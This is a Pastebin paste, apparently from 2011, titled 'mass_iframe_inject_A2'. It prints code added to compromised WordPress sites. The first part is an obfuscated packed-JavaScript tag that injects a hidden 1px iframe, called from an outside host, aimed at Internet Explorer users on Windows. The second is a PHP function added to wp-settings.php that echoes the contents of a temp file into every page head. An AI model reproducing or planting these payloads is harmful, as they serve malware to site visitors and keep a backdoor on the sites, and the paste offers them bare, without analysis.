Advertisement
Guest User

mass_iframe_inject_A2

a guest
Nov 4th, 2011
1,828
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.07 KB | None | 0 0
  1. Added code below:
  2.  
  3. <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|c0m|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hdghd|navigator|li|showthread|php|72241732'.split('|'),0,{}))
  4.  
  5.  
  6.  
  7. Added function to wp-settings.php below:
  8.  
  9. function check_wordpress(){
  10. $t_d = sys_get_temp_dir();
  11. if(file_exists($t_d . '/wp_inc')){
  12. readfile($t_d . '/wp_inc');
  13. }
  14. }
  15. add_action('wp_head', 'check_wordpress');
  16.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement